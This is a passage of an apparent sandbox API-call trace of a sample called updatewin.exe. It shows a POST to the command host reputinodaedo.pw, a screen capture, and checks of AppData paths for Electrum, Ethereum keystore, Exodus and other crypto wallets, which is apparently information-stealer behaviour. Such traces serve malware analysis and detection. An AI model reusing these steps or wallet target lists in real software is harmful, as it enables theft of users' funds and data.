lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0118.850] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x4006f0 [0118.850] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x400718 [0118.850] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4006f0 | out: hHeap=0x3f0000) returned 1 [0118.850] GetStartupInfoW (in: lpStartupInfo=0x36fa18 | out: lpStartupInfo=0x36fa18*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0118.850] GetUserDefaultLangID () returned 0x409 [0118.851] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x4006f0 [0118.851] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x400740 [0118.851] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x401b38 [0118.851] GetLastError () returned 0x0 [0118.851] SetLastError (dwErrCode=0x0) [0118.851] GetLastError () returned 0x0 [0118.851] SetLastError (dwErrCode=0x0) [0118.851] GetLastError () returned 0x0 [0118.852] SetLastError (dwErrCode=0x0) [0118.852] GetLastError () returned 0x0 [0118.852] SetLastError (dwErrCode=0x0) [0118.852] GetLastError () returned 0x0 [0118.852] SetLastError (dwErrCode=0x0) [0118.852] GetLastError () returned 0x0 [0118.852] SetLastError (dwErrCode=0x0) [0118.852] GetLastError () returned 0x0 [0118.852] SetLastError (dwErrCode=0x0) [0118.852] GetLastError () returned 0x0 [0118.852] SetLastError (dwErrCode=0x0) [0118.852] GetLastError () returned 0x0 [0118.852] SetLastError (dwErrCode=0x0) [0118.852] GetLastError () returned 0x0 [0118.852] SetLastError (dwErrCode=0x0) [0118.852] GetLastError () returned 0x0 [0118.852] SetLastError (dwErrCode=0x0) [0118.852] GetLastError () returned 0x0 [0118.852] SetLastError (dwErrCode=0x0) [0118.852] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x401b38 | out: hHeap=0x3f0000) returned 1 [0118.853] GetEnvironmentVariableA (in: lpName="localappdata", lpBuffer=0x36f000, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x2b [0118.853] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x401b38 [0118.853] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x401b70 [0118.853] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x401bb8 [0118.853] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x6400000) returned 0x1400020 [0118.858] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x4098) returned 0x402420 [0118.859] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x8) returned 0x401c00 [0118.859] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x401b70 | out: hHeap=0x3f0000) returned 1 [0118.859] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x401b38 | out: hHeap=0x3f0000) returned 1 [0118.859] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x400768 [0118.859] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x400790 [0118.859] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x4007b8 [0118.859] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x4007e0 [0118.859] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x400808 [0118.859] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x400830 [0118.859] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x400858 [0118.859] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x401b38 [0118.859] GetLastError () returned 0x0 [0118.859] SetLastError (dwErrCode=0x0) [0118.859] GetLastError () returned 0x0 [0118.859] SetLastError (dwErrCode=0x0) [0118.859] GetLastError () returned 0x0 [0118.859] SetLastError (dwErrCode=0x0) [0118.860] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x401b38 | out: hHeap=0x3f0000) returned 1 [0118.860] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x401b38 [0118.860] GetLastError () returned 0x0 [0118.860] SetLastError (dwErrCode=0x0) [0118.860] GetLastError () returned 0x0 [0118.860] SetLastError (dwErrCode=0x0) [0118.860] GetLastError () returned 0x0 [0118.860] SetLastError (dwErrCode=0x0) [0118.860] GetLastError () returned 0x0 [0118.860] SetLastError (dwErrCode=0x0) [0118.860] GetLastError () returned 0x0 [0118.860] SetLastError (dwErrCode=0x0) [0118.860] GetLastError () returned 0x0 [0118.860] SetLastError (dwErrCode=0x0) [0118.860] GetLastError () returned 0x0 [0118.860] SetLastError (dwErrCode=0x0) [0118.860] GetLastError () returned 0x0 [0118.860] SetLastError (dwErrCode=0x0) [0118.860] GetLastError () returned 0x0 [0118.860] SetLastError (dwErrCode=0x0) [0118.860] GetLastError () returned 0x0 [0118.860] SetLastError (dwErrCode=0x0) [0118.860] GetLastError () returned 0x0 [0118.860] SetLastError (dwErrCode=0x0) [0118.860] GetLastError () returned 0x0 [0118.861] SetLastError (dwErrCode=0x0) [0118.861] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x401b38 | out: hHeap=0x3f0000) returned 1 [0118.861] GetEnvironmentVariableA (in: lpName="localappdata", lpBuffer=0x36f000, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x2b [0118.861] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x401b38 [0118.861] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x401b70 [0118.861] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x401b38 | out: hHeap=0x3f0000) returned 1 [0118.861] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x36f394 | out: Wow64Process=0x36f394) returned 1 [0118.861] GetTickCount () returned 0x114fb9e [0118.861] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x400880 [0118.861] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x401b38 [0118.861] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x400880 | out: hHeap=0x3f0000) returned 1 [0118.861] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x401c10 [0118.861] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x401b38 | out: hHeap=0x3f0000) returned 1 [0118.861] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x8f) returned 0x401c78 [0118.861] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x401c10 | out: hHeap=0x3f0000) returned 1 [0118.861] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x400740 | out: hHeap=0x3f0000) returned 1 [0118.861] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4006f0 | out: hHeap=0x3f0000) returned 1 [0118.861] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x36f34c | out: Wow64Process=0x36f34c) returned 1 [0118.861] GetTickCount () returned 0x114fb9e [0118.861] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x4006f0 [0118.861] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x401b38 [0118.861] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4006f0 | out: hHeap=0x3f0000) returned 1 [0118.861] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x401c10 [0118.861] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x401b38 | out: hHeap=0x3f0000) returned 1 [0118.862] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x8f) returned 0x401d10 [0118.862] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x401c10 | out: hHeap=0x3f0000) returned 1 [0118.862] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x4006f0 [0118.862] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x401c10 [0118.862] GetLastError () returned 0x0 [0118.862] SetLastError (dwErrCode=0x0) [0118.862] GetLastError () returned 0x0 [0118.862] SetLastError (dwErrCode=0x0) [0118.862] GetLastError () returned 0x0 [0118.862] SetLastError (dwErrCode=0x0) [0118.862] GetLastError () returned 0x0 [0118.862] SetLastError (dwErrCode=0x0) [0118.862] GetLastError () returned 0x0 [0118.862] SetLastError (dwErrCode=0x0) [0118.862] GetLastError () returned 0x0 [0118.862] SetLastError (dwErrCode=0x0) [0118.862] GetLastError () returned 0x0 [0118.863] SetLastError (dwErrCode=0x0) [0118.863] GetLastError () returned 0x0 [0118.863] SetLastError (dwErrCode=0x0) [0118.863] GetLastError () returned 0x0 [0118.863] SetLastError (dwErrCode=0x0) [0118.863] GetLastError () returned 0x0 [0118.863] SetLastError (dwErrCode=0x0) [0118.863] GetLastError () returned 0x0 [0118.863] SetLastError (dwErrCode=0x0) [0118.863] GetLastError () returned 0x0 [0118.863] SetLastError (dwErrCode=0x0) [0118.863] GetLastError () returned 0x0 [0118.863] SetLastError (dwErrCode=0x0) [0118.863] GetLastError () returned 0x0 [0118.863] SetLastError (dwErrCode=0x0) [0118.863] GetLastError () returned 0x0 [0118.863] SetLastError (dwErrCode=0x0) [0118.863] GetLastError () returned 0x0 [0118.863] SetLastError (dwErrCode=0x0) [0118.863] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x400740 [0118.863] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x401c10 | out: hHeap=0x3f0000) returned 1 [0118.863] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x401c10 [0118.863] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x400880 [0118.863] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x401c10 | out: hHeap=0x3f0000) returned 1 [0118.863] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x401b38 [0118.864] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x400880 | out: hHeap=0x3f0000) returned 1 [0118.864] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x400740 | out: hHeap=0x3f0000) returned 1 [0118.864] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4006f0 | out: hHeap=0x3f0000) returned 1 [0118.864] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x758d0000 [0119.336] InternetOpenA (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 83.0.2350.121 Safari/537.36", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0119.566] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x5, lpBuffer=0x36f394, dwBufferLength=0x4) returned 1 [0119.566] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x6, lpBuffer=0x36f394, dwBufferLength=0x4) returned 1 [0119.566] InternetSetOptionA (hInternet=0xcc0004, dwOption=0x2, lpBuffer=0x36f394, dwBufferLength=0x4) returned 1 [0119.566] InternetConnectA (hInternet=0xcc0004, lpszServerName="reputinodaedo.pw", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0119.566] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/cfg/", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x4c00100, dwContext=0x0) returned 0xcc000c [0119.638] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0xa0) returned 0x4214e0 [0119.638] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x120) returned 0x4231c0 [0119.638] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4214e0 | out: hHeap=0x3f0000) returned 1 [0119.638] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type: text/html\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit / 537.36 (KHTML, like Gecko) Chrome / 83.0.2350.121 Safari/537.36\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3", dwHeadersLength=0x116, lpOptional=0x401b38*, dwOptionalLength=0x29) returned 1 [0122.711] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x36cb20, dwNumberOfBytesToRead=0x27ff, lpdwNumberOfBytesRead=0x36f3ac | out: lpBuffer=0x36cb20*, lpdwNumberOfBytesRead=0x36f3ac*=0x1c) returned 1 [0122.711] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x4269d0 [0122.712] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x9124ac8 [0122.712] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4269d0 | out: hHeap=0x3f0000) returned 1 [0122.712] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x36cb20, dwNumberOfBytesToRead=0x27ff, lpdwNumberOfBytesRead=0x36f3ac | out: lpBuffer=0x36cb20*, lpdwNumberOfBytesRead=0x36f3ac*=0x0) returned 1 [0122.712] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0122.712] InternetCloseHandle (hInternet=0xcc0008) returned 0 [0122.712] InternetCloseHandle (hInternet=0xcc000c) returned 0 [0122.712] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4231c0 | out: hHeap=0x3f0000) returned 1 [0122.712] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x401b38 | out: hHeap=0x3f0000) returned 1 [0122.712] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x401d10 | out: hHeap=0x3f0000) returned 1 [0122.712] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x4227b8 [0122.712] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9124ac8 | out: hHeap=0x3f0000) returned 1 [0122.712] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x4d1710 [0122.712] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4d1710 | out: hHeap=0x3f0000) returned 1 [0122.712] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4227b8 | out: hHeap=0x3f0000) returned 1 [0122.712] GetEnvironmentVariableA (in: lpName="ProgramData", lpBuffer=0x36efc0, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0122.712] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174db0 [0122.712] GetFileAttributesA (lpFileName="C:\\ProgramData\\r9t8s3p6v6t8s3p6v6" (normalized: "c:\\programdata\\r9t8s3p6v6t8s3p6v6")) returned 0xffffffff [0122.712] CreateDirectoryA (lpPathName="C:\\ProgramData\\r9t8s3p6v6t8s3p6v6" (normalized: "c:\\programdata\\r9t8s3p6v6t8s3p6v6"), lpSecurityAttributes=0x0) returned 1 [0122.713] GetTickCount () returned 0x11509d1 [0122.713] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x45df48 [0122.713] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45df48 | out: hHeap=0x3f0000) returned 1 [0122.713] GetTickCount () returned 0x11509d1 [0122.713] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x45df48 [0122.713] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x45df48 | out: hHeap=0x3f0000) returned 1 [0122.713] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0122.713] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x45df48 [0122.713] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x401b70 | out: hHeap=0x3f0000) returned 1 [0122.713] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9174de8 | out: hHeap=0x3f0000) returned 1 [0122.713] LoadLibraryA (lpLibFileName="User32.dll") returned 0x77130000 [0122.714] GetDC (hWnd=0x0) returned 0xffffffff9f0107c3 [0122.714] EnumDisplayMonitors (hdc=0x9f0107c3, lprcClip=0x0, lpfnEnum=0x13c96ec, dwData=0x36f530) returned 1 [0122.714] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x36f3b0 | out: lpmi=0x36f3b0) returned 1 [0122.714] LoadLibraryA (lpLibFileName="gdiplus.dll") returned 0x747f0000 [0124.308] GdiplusStartup (in: token=0x36f338, input=0x36f340, output=0x0 | out: token=0x36f338, output=0x0) returned 0x0 [0124.959] LoadLibraryA (lpLibFileName="Gdi32.dll") returned 0x770a0000 [0124.960] CreateDCA (pwszDriver=0x0, pwszDevice="\\\\.\\DISPLAY1", pszPort=0x0, pdm=0x0) returned 0x160101c1 [0124.960] GetDeviceCaps (hdc=0x160101c1, index=12) returned 32 [0124.960] CreateCompatibleDC (hdc=0x160101c1) returned 0x170109ca [0124.960] CreateDIBSection (in: hdc=0x160101c1, lpbmi=0x36f350, usage=0x1, ppvBits=0x36f37c, hSection=0x0, offset=0x0 | out: ppvBits=0x36f37c) returned 0x70509c0 [0124.962] SaveDC (hdc=0x170109ca) returned 1 [0124.962] SelectObject (hdc=0x170109ca, h=0x70509c0) returned 0x185000f [0124.962] BitBlt (hdc=0x170109ca, x=0, y=0, cx=1440, cy=900, hdcSrc=0x160101c1, x1=0, y1=0, rop=0xcc0020) returned 1 [0125.208] RestoreDC (hdc=0x170109ca, nSavedDC=1) returned 1 [0125.208] DeleteDC (hdc=0x170109ca) returned 1 [0125.208] DeleteDC (hdc=0x160101c1) returned 1 [0125.208] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x14) returned 0x415330 [0125.296] GdipGetImageEncodersSize (numEncoders=0x36f2e8, size=0x36f2ec) returned 0x0 [0125.297] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x410) returned 0x41fae8 [0125.297] GdipGetImageEncoders (in: numEncoders=0x5, size=0x410, encoders=0x41fae8 | out: encoders=0x41fae8) returned 0x0 [0125.297] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41fae8 | out: hHeap=0x3f0000) returned 1 [0125.297] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x415330 | out: hHeap=0x3f0000) returned 1 [0125.298] GdipAlloc (size=0x10) returned 0x9412910 [0125.353] GdipCreateBitmapFromHBITMAP (hbm=0x70509c0, hpal=0x0, bitmap=0x36f308) returned 0x0 [0125.525] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x76620000 [0125.525] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x36f31c | out: ppstm=0x36f31c*=0x91254c8) returned 0x0 [0125.571] GdipSaveImageToStream (image=0x9412928, stream=0x91254c8, clsidEncoder=0x36f3a0*(Data1=0x557cf406, Data2=0x1a04, Data3=0x11d3, Data4=([0]=0x9a, [1]=0x73, [2]=0x0, [3]=0x0, [4]=0xf8, [5]=0x1e, [6]=0xf3, [7]=0x2e)), encoderParams=0x0) returned 0x0 [0127.491] IStream:RemoteSeek (in: This=0x91254c8, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0127.491] IStream:Stat (in: This=0x91254c8, pstatstg=0x36f458, grfStatFlag=0x1 | out: pstatstg=0x36f458) returned 0x0 [0127.491] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x1aa0a0) returned 0xabc0020 [0127.492] ISequentialStream:RemoteRead (in: This=0x91254c8, pv=0xabc0020, cb=0x1aa0a0, pcbRead=0x36f33c | out: pv=0xabc0020*=0x89, pcbRead=0x36f33c*=0x1aa0a0) returned 0x0 [0127.508] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x1aa0d3) returned 0xb0c0020 [0127.543] GetLocalTime (in: lpSystemTime=0x36edd8 | out: lpSystemTime=0x36edd8*(wYear=0x7e4, wMonth=0xc, wDayOfWeek=0x6, wDay=0x13, wHour=0x9, wMinute=0xc, wSecond=0x22, wMilliseconds=0x39e)) [0127.543] SystemTimeToFileTime (in: lpSystemTime=0x36edd8, lpFileTime=0x36ede8 | out: lpFileTime=0x36ede8) returned 1 [0127.543] FileTimeToSystemTime (in: lpFileTime=0x36edc8, lpSystemTime=0x36edb0 | out: lpSystemTime=0x36edb0) returned 1 [0127.543] GetDesktopWindow () returned 0x10010 [0127.544] GetTickCount () returned 0x115190d [0127.544] GetLastError () returned 0x0 [0127.544] SetLastError (dwErrCode=0x0) [0127.544] GetLastError () returned 0x0 [0127.544] SetLastError (dwErrCode=0x0) [0127.544] GetLastError () returned 0x0 [0127.544] SetLastError (dwErrCode=0x0) [0127.544] GetLastError () returned 0x0 [0127.544] SetLastError (dwErrCode=0x0) [0127.544] GetLastError () returned 0x0 [0127.544] SetLastError (dwErrCode=0x0) [0127.544] GetLastError () returned 0x0 [0127.544] SetLastError (dwErrCode=0x0) [0127.544] GetLastError () returned 0x0 [0127.544] SetLastError (dwErrCode=0x0) [0127.544] GetLastError () returned 0x0 [0127.544] SetLastError (dwErrCode=0x0) [0127.544] GetLastError () returned 0x0 [0127.544] SetLastError (dwErrCode=0x0) [0127.544] GetLastError () returned 0x0 [0127.544] SetLastError (dwErrCode=0x0) [0127.544] GetLastError () returned 0x0 [0127.544] SetLastError (dwErrCode=0x0) [0127.544] GetLastError () returned 0x0 [0127.544] SetLastError (dwErrCode=0x0) [0127.544] GetLastError () returned 0x0 [0127.544] SetLastError (dwErrCode=0x0) [0127.544] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x6afa8) returned 0xa9c0048 [0133.019] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x9) returned 0x91262e8 [0133.020] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x360) returned 0x41fae8 [0133.020] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0xabc0020 | out: hHeap=0x3f0000) returned 1 [0133.076] IUnknown:Release (This=0x91254c8) returned 0x0 [0133.097] GdipDisposeImage (image=0x9412928) returned 0x0 [0133.136] GdipFree (ptr=0x9412910) [0133.136] DeleteObject (ho=0x70509c0) returned 1 [0133.173] GdiplusShutdown (token=0x26769) [0134.704] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0xb0c0020 | out: hHeap=0x3f0000) returned 1 [0134.851] GetEnvironmentVariableA (in: lpName="AppData", lpBuffer=0x36eff8, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0134.851] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174de8 [0134.851] GetEnvironmentVariableA (in: lpName="HomePath", lpBuffer=0x36eff8, nSize=0x400 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b [0134.851] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x20) returned 0x41e2e0 [0134.852] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x30) returned 0x9174e58 [0134.852] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x41e2e0 | out: hHeap=0x3f0000) returned 1 [0134.852] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.852] GetFileAttributesA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Electrum\\wallets" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\electrum\\wallets")) returned 0xffffffff [0134.852] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.852] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.852] GetFileAttributesA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\MultiBit" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\multibit")) returned 0xffffffff [0134.852] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.852] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.852] GetFileAttributesA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Armory" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\armory")) returned 0xffffffff [0134.852] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.852] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.852] GetFileAttributesA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ethereum\\keystore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ethereum\\keystore")) returned 0xffffffff [0134.852] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.852] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.852] GetFileAttributesA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\bytecoin" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\bytecoin")) returned 0xffffffff [0134.852] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.852] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x4d17c0 [0134.853] GetFileAttributesA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Jaxx\\Local Storage" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\jaxx\\local storage")) returned 0xffffffff [0134.853] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4d17c0 | out: hHeap=0x3f0000) returned 1 [0134.853] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x60) returned 0x4cd618 [0134.853] GetFileAttributesA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\com.liberty.jaxx\\Local Storage\\leveldb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\com.liberty.jaxx\\local storage\\leveldb")) returned 0xffffffff [0134.853] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4cd618 | out: hHeap=0x3f0000) returned 1 [0134.853] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x50) returned 0x4d17c0 [0134.853] GetFileAttributesA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\atomic\\Local Storage\\leveldb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\atomic\\local storage\\leveldb")) returned 0xffffffff [0134.853] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x4d17c0 | out: hHeap=0x3f0000) returned 1 [0134.853] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.853] GetFileAttributesA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Exodus" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\exodus")) returned 0xffffffff [0134.853] HeapFree (in: hHeap=0x3f0000, dwFlags=0x0, lpMem=0x9127840 | out: hHeap=0x3f0000) returned 1 [0134.853] RtlAllocateHeap (HeapHandle=0x3f0000, Flags=0x0, Size=0x40) returned 0x9127840 [0134.853] GetFileAttributesA 